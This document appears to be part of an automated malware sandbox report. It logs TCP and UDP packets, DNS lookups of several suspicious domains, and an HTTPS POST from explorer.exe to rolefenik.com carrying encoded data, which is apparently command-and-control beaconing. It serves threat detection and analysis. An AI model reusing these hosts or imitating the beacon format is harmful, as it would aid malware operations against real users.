                                                                                                                                          Nov 13, 2024 18:23:46.862472057 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:46.862659931 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:46.862896919 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:46.862935066 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:47.622493982 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:23:47.721618891 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:47.721690893 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:47.722235918 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:47.722248077 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:47.723542929 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:47.723550081 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.028440952 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:23:48.496325016 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.496402025 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.496959925 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:48.509474039 CET50084443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:48.509526014 CET44350084104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.518028021 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:48.518074989 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.518688917 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:48.518877029 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:48.518888950 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:48.715951920 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:23:49.135493994 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.135574102 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:49.143779039 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:49.143805981 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.188024044 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:49.188054085 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.587663889 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.587729931 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:49.587755919 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.587769985 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.587791920 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:49.587824106 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:49.588196039 CET50085443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:49.588213921 CET44350085104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.594518900 CET50086443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:49.594629049 CET44350086104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.594922066 CET50086443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:49.594922066 CET50086443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:49.595009089 CET44350086104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:49.919080973 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:23:50.472757101 CET44350086104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:50.473952055 CET50086443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:50.474476099 CET50086443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:50.474498987 CET44350086104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:50.475370884 CET50086443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:50.475378036 CET44350086104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:51.310992002 CET44350086104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:51.311085939 CET44350086104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:51.311300993 CET50086443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:51.316757917 CET50086443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:51.316806078 CET44350086104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:51.330615044 CET50087443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:51.330667973 CET44350087104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:51.330981970 CET50087443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:51.331212997 CET50087443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:51.331222057 CET44350087104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:52.243906021 CET44350087104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:52.244014025 CET50087443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:52.244503975 CET50087443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:52.244513988 CET44350087104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:52.245704889 CET50087443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:52.245714903 CET44350087104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:52.419061899 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:23:52.739135027 CET44350087104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:52.739222050 CET44350087104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:52.739270926 CET50087443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:52.739270926 CET50087443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:52.739552021 CET50087443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:52.739573956 CET44350087104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:52.744105101 CET50088443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:52.744149923 CET44350088104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:52.744261980 CET50088443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:52.744419098 CET50088443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:52.744431973 CET44350088104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:53.654015064 CET44350088104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:53.654205084 CET50088443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:53.654540062 CET50088443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:53.654570103 CET44350088104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:53.655508041 CET50088443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:53.655522108 CET44350088104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:54.248250008 CET44350088104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:54.248327971 CET44350088104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:54.248414040 CET50088443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:54.248414040 CET50088443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:54.248553991 CET50088443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:54.248574972 CET44350088104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:54.268584013 CET50089443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:54.268649101 CET44350089104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:54.268712997 CET50089443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:54.268944979 CET50089443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:54.268959045 CET44350089104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:54.892221928 CET44350089104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:54.892301083 CET50089443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:54.893060923 CET50089443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:54.893074989 CET44350089104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:54.893953085 CET50089443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:54.893960953 CET44350089104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:55.285671949 CET44350089104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:55.285741091 CET50089443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:55.285756111 CET44350089104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:55.285831928 CET50089443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:55.286148071 CET50089443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:55.286168098 CET44350089104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:55.291140079 CET50090443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:55.291198015 CET44350090104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:55.291270018 CET50090443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:55.291450024 CET50090443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:55.291464090 CET44350090104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:56.148303986 CET44350090104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:56.149717093 CET50090443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:56.151180983 CET50090443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:56.151180983 CET50090443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:56.151220083 CET44350090104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:56.151253939 CET44350090104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:56.793788910 CET44350090104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:56.793889999 CET44350090104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:56.794056892 CET50090443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:56.794056892 CET50090443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:56.794365883 CET50090443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:56.794403076 CET44350090104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:56.814569950 CET50091443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:56.814620972 CET44350091104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:56.814714909 CET50091443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:56.814897060 CET50091443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:56.814907074 CET44350091104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:57.231573105 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:23:57.448894978 CET44350091104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:57.448971987 CET50091443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:57.449439049 CET50091443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:57.449444056 CET44350091104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:57.450855970 CET50091443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:57.450860023 CET44350091104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:57.970949888 CET44350091104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:57.971043110 CET44350091104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:57.971267939 CET50091443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:57.971889973 CET50091443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:57.971904993 CET44350091104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:57.980395079 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:57.980443001 CET44350092104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:57.981699944 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:57.984715939 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:57.984730005 CET44350092104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:58.865674973 CET44350092104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:58.865756989 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:58.866245031 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:58.866251945 CET44350092104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:58.867808104 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:58.867814064 CET44350092104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:59.743711948 CET44350092104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:59.743772030 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:59.743798971 CET44350092104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:59.743818998 CET44350092104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:59.743849039 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:59.743871927 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:59.744229078 CET50092443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:23:59.744247913 CET44350092104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:59.755162954 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:59.755270004 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:23:59.755418062 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:59.757898092 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:23:59.757909060 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:00.671040058 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:00.671217918 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:00.671624899 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:00.671633005 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:00.672967911 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:00.672972918 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:01.386408091 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:01.386476040 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:01.386948109 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:01.386991978 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:01.386998892 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:01.387029886 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:01.387048006 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:01.387067080 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:01.387258053 CET50093443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:01.387281895 CET44350093104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:01.392637968 CET50094443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:01.392682076 CET44350094104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:01.392744064 CET50094443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:01.392941952 CET50094443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:01.392956018 CET44350094104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:02.013571024 CET44350094104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:02.013688087 CET50094443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:02.014446974 CET50094443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:02.014455080 CET44350094104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:02.015201092 CET50094443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:02.015204906 CET44350094104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:02.737385988 CET44350094104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:02.737579107 CET50094443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:02.737653971 CET44350094104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:02.737859011 CET44350094104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:02.738090992 CET50094443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:02.738249063 CET50094443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:02.738269091 CET44350094104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:02.753922939 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:02.754025936 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:02.754406929 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:02.754858017 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:02.754893064 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:03.637645960 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:03.637736082 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:03.642399073 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:03.642412901 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:03.644133091 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:03.644145012 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503483057 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503556967 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503592014 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503638029 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503644943 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503688097 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503736019 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.503783941 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503905058 CET50095443192.168.2.6104.21.92.105
                                                                                                                                          Nov 13, 2024 18:24:04.503923893 CET44350095104.21.92.105192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.508225918 CET50096443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:04.508277893 CET44350096104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:04.508541107 CET50096443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:04.508541107 CET50096443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:04.508584023 CET44350096104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:06.448425055 CET44350096104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:06.448528051 CET50096443192.168.2.6104.21.15.162
                                                                                                                                          Nov 13, 2024 18:24:06.919137955 CET499829043192.168.2.687.120.37.120
                                                                                                                                          Nov 13, 2024 18:24:17.220603943 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:24:17.226912022 CET90435005245.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:17.227042913 CET500529043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:24:21.301868916 CET44350096104.21.15.162192.168.2.6
                                                                                                                                          Nov 13, 2024 18:24:21.304238081 CET50096443192.168.2.6104.21.15.162

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 13, 2024 18:20:07.662364006 CET6263353192.168.2.61.1.1.1
                                                                                                                                          Nov 13, 2024 18:20:08.008101940 CET53626331.1.1.1192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:01.281399012 CET5358753192.168.2.61.1.1.1
                                                                                                                                          Nov 13, 2024 18:21:01.603162050 CET53535871.1.1.1192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:34.585939884 CET6202753192.168.2.61.1.1.1
                                                                                                                                          Nov 13, 2024 18:21:34.595989943 CET53620271.1.1.1192.168.2.6
                                                                                                                                          Nov 13, 2024 18:21:35.842710972 CET6512653192.168.2.61.1.1.1
                                                                                                                                          Nov 13, 2024 18:21:35.857342005 CET53651261.1.1.1192.168.2.6

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Nov 13, 2024 18:20:07.662364006 CET192.168.2.61.1.1.10x7727Standard query (0)burjog.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 13, 2024 18:21:01.281399012 CET192.168.2.61.1.1.10xcbc4Standard query (0)samomol.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 13, 2024 18:21:34.585939884 CET192.168.2.61.1.1.10x7299Standard query (0)rolefenik.comA (IP address)IN (0x0001)false
                                                                                                                                          Nov 13, 2024 18:21:35.842710972 CET192.168.2.61.1.1.10xa95Standard query (0)ergiholim.comA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Nov 13, 2024 18:20:08.008101940 CET1.1.1.1192.168.2.60x7727No error (0)burjog.com45.143.166.230A (IP address)IN (0x0001)false
                                                                                                                                          Nov 13, 2024 18:21:01.603162050 CET1.1.1.1192.168.2.60xcbc4No error (0)samomol.com87.120.37.120A (IP address)IN (0x0001)false
                                                                                                                                          Nov 13, 2024 18:21:34.595989943 CET1.1.1.1192.168.2.60x7299No error (0)rolefenik.com104.21.92.105A (IP address)IN (0x0001)false
                                                                                                                                          Nov 13, 2024 18:21:34.595989943 CET1.1.1.1192.168.2.60x7299No error (0)rolefenik.com172.67.191.232A (IP address)IN (0x0001)false
                                                                                                                                          Nov 13, 2024 18:21:35.857342005 CET1.1.1.1192.168.2.60xa95No error (0)ergiholim.com104.21.15.162A (IP address)IN (0x0001)false
                                                                                                                                          Nov 13, 2024 18:21:35.857342005 CET1.1.1.1192.168.2.60xa95No error (0)ergiholim.com172.67.163.30A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • rolefenik.com
                                                                                                                                          • ergiholim.com

                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.649988104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:35 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:35 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:35 UTC753INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:35 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J07vdHmpTbgXkpU0PT%2FSrvVfERHCS%2FTR%2Fxulfo6PY7tBjXcE4LmIrekqqblqQjd%2FwRtqQGixEER2CCRXuKpZZEiEA9ACPwRJjedptWI%2FYHMI4pHFIfEvVDC%2F5kxgjfVZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070645cb9f9ea-SJC
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41334&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=70093&cwnd=32&unsent_bytes=0&cid=ded42fc163fc42e5&ts=542&x=0"
                                                                                                                                          2024-11-13 17:21:35 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
